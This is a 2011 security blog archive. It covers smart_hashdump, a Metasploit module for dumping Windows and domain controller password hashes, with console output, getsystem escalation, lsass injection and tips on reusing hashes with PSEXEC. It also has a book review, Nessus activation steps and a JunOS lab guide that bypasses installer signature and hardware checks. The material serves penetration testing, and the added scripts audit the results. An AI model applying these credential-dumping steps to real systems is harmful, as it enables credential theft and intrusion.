Entries from May 1, 2011 - May 31, 2011

Wednesday, May 18, 2011

Metasploit Post Module smart_hashdump

A couple of months ago the NWN guys from the pentest team asked me to help them automate dumping Windows hashes depending on the role and privilege level, so I wrote hashdump2, a Meterpreter script that automated what was required back then. This week Mubix wrote a blog post on his experience and process when dumping hashes on x64 systems, especially Windows 2008 R2 Domain Controllers. I rewrote the hashdump2 script, added the logic that Mubix came up with, added the ability to escalate privileges using the getsystem API call, reworked the logic of the script and ported the result to a post module; both are called smart_hashdump. The module and the script work as follows:

  • It first checks the privilege level and OS.
  • It checks whether the target is a Domain Controller.
  • Based on this information it prefers reading the registry to get the hashes if possible; if that is not possible, it injects into the lsass process if possible. For Domain Controllers it uses the injection into lsass.
  • If the target is a Windows 2008 server and the process is running with admin privileges, it attempts to get SYSTEM privilege using getsystem. Even if it gets SYSTEM privilege, due to the way the token privileges are set it still cannot inject into the lsass process, so the code migrates to a process already running as SYSTEM and then injects into the lsass process.
  • If the code detects that it is running on a Windows 7/Vista box with UAC disabled and as local admin, it runs getsystem and uses the registry read method.
  • On Windows 2003/2000/XP it uses getsystem and, if successful, uses the registry read method.

Script:

meterpreter > run smart_hashdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on 
privilage level, OS and Role of host.
OPTIONS:
    -h        Help menu.
    -l <opt>  Log folder to save results, if none provided default log path will be used.
    -s <opt>  Try to get SYSTEM Privilege

Module:

msf exploit(handler) > use post/windows/gather/smart_hashdump 
msf post(smart_hashdump) > info
       Name: Windows Gather Local and Domain Controler Account Password Hashes
     Module: post/windows/gather/smart_hashdump
    Version: $Revision$
   Platform: Windows
       Arch: 
       Rank: Normal
Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>
Description:
  This will dump local accounts from the SAM Database and if the 
  targets host is a Domain Controller the Domain Account Database 
  using the proper technique depending on privilage level, OS and Role 
  of host.
msf post(smart_hashdump) > show options 
Module options (post/windows/gather/smart_hashdump):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
   SESSION                     yes       The session to run this module on.

Both use the same calls and print almost the same messages, so let's use the post module, since that is where most of the code is moving to. First let's run it on a Windows 2008 R2 DC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN2K8R2-01
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
[+]     This host is a Domain Controller!
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
[+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::


On a Windows 7 System with UAC Disabled as Administrator:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::


On a Windows 7 System as Administrator with UAC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN-KVJG16GEMOJ
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
[-] Insufficient privileges to dump hashes!

Sadly UAC does a good job at blocking dumping the hashes even as Administrator; it will even block getsystem.


On a Windows XP System:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
[*] Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.

To get a list of all the accounts and hashes from the main console:

msf exploit(handler) > db_creds 
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
[*] Found 9 credentials

If you are going to use those hashes with PSEXEC and for cracking, remember to filter out the Guest, SUPPORT_* and HelpAssistant accounts, since they are typically disabled. On the Domain Controller the account named hostname$ is the Active Directory Recovery Account, which many times is the same as the Domain Admin account, and it cannot be used remotely.

I included the creation of a loot file with the hashes for 2 reasons:

  1. It saves the SID of the account, so the accounts can be identified and used if needed.
  2. Sometimes you do not have a database attached, or you delete a workspace by accident.
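
The loot file uses the layout seen in the output above (user:RID:LM:NT:::). As an added example, not part of the module or of the original post, the following parses such files for the report: it drops the Guest, SUPPORT_* and HelpAssistant accounts mentioned above, then flags stored LM hashes, blank passwords and NT hashes reused across hosts. Host names and the repeated-digit hashes are constructed; only the two empty-password constants are real values.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Accounts the post says to filter because they are typically disabled.
SKIP = re.compile(r"^(guest|helpassistant|support_.*)$", re.IGNORECASE)

# Layout printed by the module and saved to loot: user:RID:LM:NT:::
LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Split pwdump-style text into parsed entries and rejected lines."""
    entries, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE.match(line)
        if m is None:
            rejected.append(line)  # keep for manual review, never guess
            continue
        entries.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
        })
    return entries, rejected


def audit(loot_by_host):
    """Build report findings from a {host: pwdump text} mapping."""
    findings = {"lm_stored": [], "blank_password": [],
                "reused_nt": {}, "rejected": []}
    seen = defaultdict(set)  # NT hash -> {(host, user), ...}
    for host, text in loot_by_host.items():
        entries, rejected = parse_pwdump(text)
        findings["rejected"].extend((host, line) for line in rejected)
        for e in entries:
            if SKIP.match(e["user"]):
                continue
            if e["lm"] != EMPTY_LM:
                # A real LM hash means LM storage is still enabled.
                findings["lm_stored"].append((host, e["user"]))
            if e["nt"] == EMPTY_NT:
                findings["blank_password"].append((host, e["user"]))
            else:
                seen[e["nt"]].add((host, e["user"]))
    for nt, accounts in seen.items():
        # Same NT hash on more than one host = same password reused.
        if len({host for host, _ in accounts}) > 1:
            findings["reused_nt"][nt] = sorted(accounts)
    return findings


# Constructed sample loot (hypothetical hosts, made-up hashes).
SAMPLE = {
    "dc01": f"Administrator:500:{EMPTY_LM}:{'1' * 32}:::\n"
            f"testuser:1109:{EMPTY_LM}:{'2' * 32}:::\n",
    "ws01": f"Administrator:500:{EMPTY_LM}:{EMPTY_NT}:::\n"
            f"adminuser:1000:{EMPTY_LM}:{'2' * 32}:::\n",
    "xp01": f"Administrator:500:{'3' * 32}:{'2' * 32}:::\n"
            f"HelpAssistant:1000:{'4' * 32}:{'5' * 32}:::\n"
            f"SUPPORT_388945a0:1002:{EMPTY_LM}:{'6' * 32}:::\n"
            "truncated:500:aad3b435\n",
}

if __name__ == "__main__":
    report = audit(SAMPLE)
    for key in ("lm_stored", "blank_password", "rejected"):
        print(key, report[key])
    for accounts in report["reused_nt"].values():
        print("password reuse:", accounts)
```
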

Script Download

Module Download

Thursday, May 12, 2011

Review of Kingpin Book

Kingpin is the story of Max Vision from his teen years to when he was arrested and sentenced as the top carder in the underground, of how his use of his hacking skills went from good to bad, and of his constant attempts to do the right thing while being pulled back into the world of a black hat. The book covers his youthful pranks, his forays into hacking and his time as one of the top white hats in the industry while the industry was young and booming during the dot-com era. Max made several bad decisions due to his temper and lack of control. In addition, the intellectual addiction that hacking produces, the rush of euphoria caused by being pitted against another, and the challenge of bypassing defenses and being a shadow, undetected and powerful inside a system, caused him to delve deeper into the wrong side of the law, not to mention the amount of money he was making and his belief that in some part he was doing good and only harming the big companies. He used that energy and passion to become the master of one of the most powerful carder forums out there. The book also covers the early history of the security industry and its players, including the small band of programmers and technologists that started many of the security companies that changed the landscape, with Max being one of the contributors to the beginnings of projects like Snort, the open source IDS, and to the sharing of knowledge that formed the beginnings of the industry. The book also covers the side of the law enforcement agencies and officers that participated in the cat-and-mouse game against the different crime organizations. It shows how law enforcement had to adapt to the ever-changing landscape of the Internet and how it changed the rules of the game.
We also see how the paths of many of the prominent figures involved in attacks intermingled in the small community of the carder underground, where many of those who were committing the crimes also at one time or another worked with law enforcement as informants and helped in operations, voluntarily or under threat of jail. My favorite part is on the hacking techniques used by these brilliant people, how they adapted and hid from law enforcement, and the mistakes that led to their discovery and arrest. One of the areas of interest is how some of the people involved successfully targeted law enforcement to gain information on operations against them. I do believe that nobody could have brought this story to life the way Poulsen did, in great part due to his history as a hacker, knowing what motivates and drives the mentality of one, and his experience as a man on the run from the law. His career as a journalist for Wired magazine provided him with the skills to convey all the technical concepts in the book in a way that is easy to grasp, taking the reader from scene to scene as played by each of the different players of the story, bringing each of those stories together and showing how they are all intertwined.

Wednesday, May 11, 2011

Activating Nessus on Backtrack 5

One of my favorite tools in my toolbox is the vulnerability scanner Nessus, in part because of its accuracy and because I'm part of one of the teams that works on adding new cool stuff to it during the day. So I was super happy to see it included as part of Backtrack. Ever since I started working professionally in security, Nessus has been part of my toolkit; once nessuscmd was out it became more integral to my workflow because I could automate stuff for my customers. Before, I always had to follow some weird procedures to get Nessus installed on the early versions of Backtrack, and those procedures were always prone to breaking when I had to update to the latest version.

I would like to share how to activate your copy of Nessus in Backtrack and some of the caveats that are present when activating it, depending on your setup. The first step is to have Backtrack installed as a virtual machine on your pentest/audit rig or installed locally on the hard drive of the machine. Do not try to activate it while running from the bootable DVD or from a USB drive if you intend to use it on several physical machines, because the registration process marries the activation to that specific host. Moving the VM from one host to another, or moving the USB drive, depending on how you configured Backtrack, is more than likely to require re-activation of your copy of Nessus.

If you are using a Professional Feed, one of the first things you need to do is go to http://support.tenable.com, log in, go to Manage Activation Codes and get your Professional Feed activation code. If you will be using a Home Feed, go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and register for a Home Feed; you will receive your activation code at the email address you provided. Once you have the activation code you can proceed to activate it on your Backtrack machine, running as root:

root@bt:~# /opt/nessus/bin/nessus-fetch --register M4D0-EWWQ-1EZU-3KSN
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

And yes, the activation code in the example is a fake one for demonstration purposes only.

The next step is to add an admin user on this box so it can connect, create profiles, policies and launch scans:

root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : carlos
Login password : 
Login password (again) : 
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that carlos has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done : 
(the user can have an empty rules set)
Login             : carlos
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] 
User added

Once the user has been created we can launch the Nessusd Daemon:

root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .

Do keep in mind that since this is the first time you will be running the daemon, it will take a while for it to load and configure all the checks. You can run top on the system and use capital P to sort by CPU and then capital R to change the order if needed; you will see that while loading, nessusd will take close to 100% of your CPU, and when finished it will normalize. Once it does, you just need to connect with your web browser to https://localhost:8834/ or, if connecting remotely, to the IP of the machine instead of localhost. Make sure that NoScript is set to allow scripts from localhost or the machine's address, depending on your case.

Tuesday, May 10, 2011

Virtualizing JunOS on VMware

Many times when working with a client network or on our own we need to test, document and validate certain network configurations in a test environment. Sadly, not many have the money for a lab in which to test different scenarios and gauge the impact that these changes might have on the production network. For a majority of configurations, when it comes to system settings and routing, a virtualized environment can be of great help; sadly this does not cover anything ASIC or hardware-specific. In this blog post I will cover how to virtualize the JunOS operating system to aid with testing and validating. I did this for a friend who needed to migrate the configuration of several of his Juniper routers to a newer version of the OS and hardware and who also asked me for recommendations for hardening the routers. I do have to say I really like JunOS, especially since it has a full FreeBSD subsystem underneath to which a user has access.

Requirements

 

Software required to install JunOS on VMware:

  • FreeBSD 4.11 mini ISO, downloaded from the FreeBSD FTP site.
  • M Series Router jinstall Domestic Signed tgz file; the Export version does not provide SSH.
  • Jweb tgz file for the version of JunOS being installed.

NOTE: Do not ask for Juniper images I will ignore those messages. You need a valid contract to obtain them.

Settings for Workstation 7.x


On VMware Workstation:

  • Create a New Virtual Machine.
  • Select the FreeBSD ISO image as the installation image.
  • Ensure that FreeBSD is selected as the operating system type.
  • Make sure the HDD is 4GB or higher and of type IDE for versions 9.x and 10.x; for version 11.x use 6GB or higher.
  • For memory, initially set 512MB for 9.x; after installation of jweb it can be changed to 256MB. For 10.x and 11.x set the initial value to 1024MB and, after install, 512MB.
  • After creating the VM and before installation, open the VMX file and make sure that the SCSI device presence setting is set to FALSE: scsi0.present = "FALSE"

Settings for VMware ESX 4.x


On VMware ESX and ESXi:

  • Create a New Virtual Machine with Operating System Other -> FreeBSD 32-bits.
  • Make sure the HDD is 4GB or higher and of type IDE for versions 9.x and 10.x; for version 11.x use 6GB or higher.
  • Select the "Edit Virtual Machine Settings Before Completion" check box.
  • Change the SCSI Controller to LSI Logic SAS.
  • For memory, initially set 512MB for 9.x; after installation of jweb it can be changed to 256MB. For 10.x and 11.x set the initial value to 1024MB and, after install, 512MB.
  • Set the FreeBSD 4.11 ISO in the CD-ROM drive and make sure that it is Connected before saving.

FreeBSD Installation


  • Skip the kernel configuration and choose the standard installation.
  • When prompted to use fdisk select OK.
  • When you get to partitioning, allocate first the whole disk to BSD.
  • Press c then OK for the other prompts and finish by selecting q.
  • Select BootMgr as the boot manager.
  • Create the disk slices as shown in the table below:

    Slice    Mount point  Size
    ad0s1a   /            2000M
    ad0s1b   Swap         1024M
    ad0s1e   /config      64M
    ad0s1f   /var         Remaining space

  • / has to be a reasonable size or else you'll run out of space on /mnt.
  • Choose 'Minimal' installation type and skip installing ports.
  • After the base is installed it will ask you if you want to configure Ethernet settings. Select yes and use DHCP to configure your NIC (em0), write down the IP given by DHCP and set a hostname for the server. This allows us to scp the jinstall file after reboot.
  • Except for DHCP on interface em0, choose "no" for everything else (IPv6, Linux compatibility, NFS, FTP, Inetd, TimeZone, etc.).
  • When asked to create a user, create one called junos, set a password for it and add it to the group wheel. Be sure to set a password for the root account.
  • After the installer completes it will reboot. Make sure that you have disconnected the CD so as to make sure the VM will not boot in to the CD again.
  • scp to /var/tmp on the VM the jinstall file only, do not copy the jweb file yet since during installation the file system will be formatted and changed.
 $ scp jinstall-<version>-domestic-signed.tgz junos@<ip>:/var/tmp
  • Once the file is there, SSH in to the server and use the su command to gain root privileges:
    $ su -

    JunOS 9.6R1


    Unpack the different parts of the installer and remove hash files used to validate the installer:

    # cd /var/tmp/
    # mkdir jinst
    # cd jinst
    # tar xvzf ../jinstall-9.6R1.13-domestic-signed.tgz
    # rm *.md5 *.sha1 *.sig
    # mkdir domestic
    # cd domestic/
    # tar xvzf ../jinstall-9.6R1.13-domestic.tgz
    # mkdir pkgtools
    # cd pkgtools
    # ls
    # tar xvzf ../pkgtools.tgz

    Make sure that the hardware check always returns true by replacing the checkpic command:

    # cp /usr/bin/true bin/checkpic

    Repackage the installer:

    # tar cvzf ../pkgtools.tgz *
    # cd ..
    # rm -rf pkgtools
    # tar cvzf ../jinstall-9.6R1.13-domestic.tgz *
    # cd ..
    # rm -rf domestic/
    # tar cvzf ../jinstall-9.6R1.13-domestic-signed.tgz *
    # cd ..
    # rm -rf jinst/

    Install the package using pkg_add:

    # pkg_add jinstall-9.6R1.13-domestic-signed.tgz
    Adding jinstall...
    sysctl: unknown oid 'hw.product.model'
    sysctl: unknown oid 'hw.re.model'
    sysctl: unknown oid 'hw.re.model'
    sysctl: unknown oid 'hw.re.model'
    WARNING:     This package will load JUNOS 9.6R1.13 software.
    WARNING:     It will save JUNOS configuration files, and SSH keys
    WARNING:     (if configured), but erase all other files and information
    WARNING:     stored on this machine.  It will attempt to preserve dumps
    WARNING:     and log files, but this can not be guaranteed.  This is the
    WARNING:     pre-installation stage and all the software is loaded when
    WARNING:     you reboot the system.
    Saving the config files ...
    Installing the bootstrap installer ...
    WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
    WARNING:     'request system reboot' command when software installation is
    WARNING:     complete. To abort the installation, do not reboot your system,
    WARNING:     instead use the 'request system software delete jinstall'
    WARNING:     command as soon as this operation completes.

    DO NOT REBOOT yet. First ensure you can interact with JunOS on the VM console:

    # chmod +w /boot/loader.conf
    # vi /boot/loader.conf

    Add this line to the file:

    console="vidconsole"

    Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

     

    JunOS 10.4R1 and JunOS 11.1R1


    This process is the same for 10.x and 11.x. Unpack the different parts of the installer and remove hash files used to validate the installer:

    # cd /var/tmp/
    # mkdir jinst
    # cd jinst
    # tar xvzf ../jinstall-10.4R1.9-domestic-signed.tgz
    # rm *.md5 *.sha1 *.sig

    Open the +INSTALL file in vi:

    # vi ./+INSTALL

    Modify the variable re_name in the check_arch_compatibility() function as shown below. Inside vi you can type :/check_arch<enter> to go directly to it.

    check_arch_compatibility()
    {
        #re_name=`/sbin/sysctl -n hw.re.name 2>/dev/null`
        re_name='olive'
        if [ -z "$re_name" ]; then
            Error "hw.re.name sysctl not supported."
        fi


    Continue unpacking the next level of the package:

    # mkdir domestic
    # cd domestic/
    # tar xvzf ../jinstall-10.4R1.9-domestic.tgz

    Open with vi +INSTALL and +REQUIRE and modify the variable re_name in the check_arch_compatibility() as done before. Unpack the pkgtools.tgz file and make the checkpic file always return true:

    # mkdir pkgtools
    # cd pkgtools
    # tar xvzf ../pkgtools.tgz
    # cp /usr/bin/true bin/checkpic

    Repackage the installer:

    # tar cvzf ../pkgtools.tgz *
    # cd ..
    # rm -rf pkgtools
    # tar cvzf ../jinstall-10.4R1.9-domestic.tgz *
    # cd ..
    # rm -rf domestic
    # tar cvzf ../jinstall-10.4R1.9-domestic-signed.tgz *
    # cd ..
    # rm -rf jinst

    Install the package:

    # pkg_add jinstall-10.4R1.9-domestic-signed.tgz
    Adding jinstall...
    sysctl: unknown oid 'hw.product.model'
    sysctl: unknown oid 'hw.re.model'
    sysctl: unknown oid 'hw.re.model'
    sysctl: unknown oid 'hw.re.model'
    WARNING:     This package will load JUNOS 10.4R1.9 software.
    WARNING:     It will save JUNOS configuration files, and SSH keys
    WARNING:     (if configured), but erase all other files and information
    WARNING:     stored on this machine.  It will attempt to preserve dumps
    WARNING:     and log files, but this can not be guaranteed.  This is the
    WARNING:     pre-installation stage and all the software is loaded when
    WARNING:     you reboot the system.
    Saving the config files ...
    Installing the bootstrap installer ...
    WARNING:     A REBOOT IS REQUIRED TO LOAD THIS SOFTWARE CORRECTLY. Use the
    WARNING:     'request system reboot' command when software installation is
    WARNING:     complete. To abort the installation, do not reboot your system,
    WARNING:     instead use the 'request system software delete jinstall'
    WARNING:     command as soon as this operation completes.

    Ensure you can interact with JunOS on the VM console. This step is not needed with version 10.4, but it is recommended in case there is a change in any other 10.x package:

    # chmod +w /boot/loader.conf
    # vi /boot/loader.conf

    Add this line to the file:

    console="vidconsole"

    Reboot the device by entering the reboot command, the installation process will take several minutes and the router will reboot twice.

    Initial Configuration


    On the console, at the login prompt enter root and press Enter at the password prompt. Enter cli to get into the command line interface of JunOS, then enter configuration mode:

    % cli
    > configure

    Set the hostname for the router:

    # set system host-name <router name>

    Set the root password:

    # set system root-authentication plain-text-password <enter>

    Create a secondary admin user to use for SSH:

    # set system login user <username> class super-user
    # set system login user <username> authentication plain-text-password <enter>

    Set an IP address on the interface em0 so as to connect to the router:

    # set interfaces em0 unit 0 family inet address <ip/mask>

    Enable SSH and set the protocol version to use to version 2:

    # set system services ssh protocol-version v2

    Enable Telnet:

    # set system services telnet

    Enable FTPD:

    # set system services ftp

    Set the default gateway:

    # set routing-options static route 0.0.0.0/0 next-hop <Default Gateway IP>

    Set the DNS server to use:

    # set system name-server <name server IP>

    Save the configuration:

    # commit

    To get the full list of software installed and versions without paging:

    > show version | no-more

    To get the full configuration:

    > show configuration | no-more

    To get the full configuration in XML format:

    > show configuration | no-more | display xml

    Install the Web Interface


    Copy the jweb file to the router using scp and the secondary admin account created above:

    $ scp jweb-<version>-signed.tgz <username>@<ip>:/var/tmp

    SSH in to the router and run:

    > request system software add /var/tmp/jweb-<version>-signed.tgz

    After the installer finishes, reboot the router:

    > request system reboot
    Reboot the system ? [yes,no] (no) yes

    It will take a while for the router to reboot since it is setting up the files for the web interface. Once the router is back up, connect to it, enter configuration mode and enable the web management system on the interface you configured:

    # set system services web-management http interface em0.0
    # commit
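
The lab configuration above turns on Telnet, FTP and HTTP web management, which is convenient on an isolated VM but should not travel with the configuration to production hardware. As an added example (not from the original post), the following replays set and delete statements under system services and reports cleartext management services and an SSH service not restricted to protocol version 2. The sample lines are constructed from the commands on this page; feeding it `show configuration | display set` output, and the https statement in the hardened sample, are assumptions of the example.

```python
# Cleartext management services and the reason each is reported.
CLEARTEXT = {
    "telnet": "Telnet carries credentials in cleartext; use SSH",
    "ftp": "FTP carries credentials in cleartext; use scp/sftp",
}


def effective_services(text):
    """Replay set/delete lines and return {service: {argument tuples}}."""
    services = {}
    for raw in text.splitlines():
        # Accept lines pasted together with the "# " or "> " prompt.
        tokens = raw.strip().lstrip("#> ").split()
        if len(tokens) < 4 or tokens[1:3] != ["system", "services"]:
            continue
        action, name, args = tokens[0], tokens[3], tuple(tokens[4:])
        if action == "set":
            services.setdefault(name, set()).add(args)
        elif action == "delete" and name in services:
            # Drop every statement at or below the deleted path.
            kept = {a for a in services[name] if a[:len(args)] != args}
            if args and kept:
                services[name] = kept
            else:
                del services[name]
    return services


def audit_services(text):
    """Return sorted (service, reason) findings for a set-style config."""
    services = effective_services(text)
    findings = [(n, why) for n, why in CLEARTEXT.items() if n in services]
    web = services.get("web-management", set())
    if any(a[:1] == ("http",) for a in web):
        findings.append(("web-management",
                         "HTTP management is cleartext; use https"))
    ssh = services.get("ssh")
    if ssh is not None:
        versions = {a[1] for a in ssh
                    if a[:1] == ("protocol-version",) and len(a) > 1}
        if versions != {"v2"}:
            findings.append(("ssh", "protocol-version is not restricted to v2"))
    return sorted(findings)


# Constructed sample: the service statements used in this walkthrough.
LAB = """\
set system host-name lab-router
set system services ssh protocol-version v2
set system services telnet
set system services ftp
set system services web-management http interface em0.0
"""

# Constructed sample: the same configuration after clean-up statements.
HARDENED = LAB + """\
delete system services telnet
delete system services ftp
delete system services web-management http
set system services web-management https system-generated-certificate
"""

if __name__ == "__main__":
    for label, cfg in (("lab", LAB), ("hardened", HARDENED)):
        print(label)
        for service, reason in audit_services(cfg) or [("-", "no findings")]:
            print(f"  {service}: {reason}")
```
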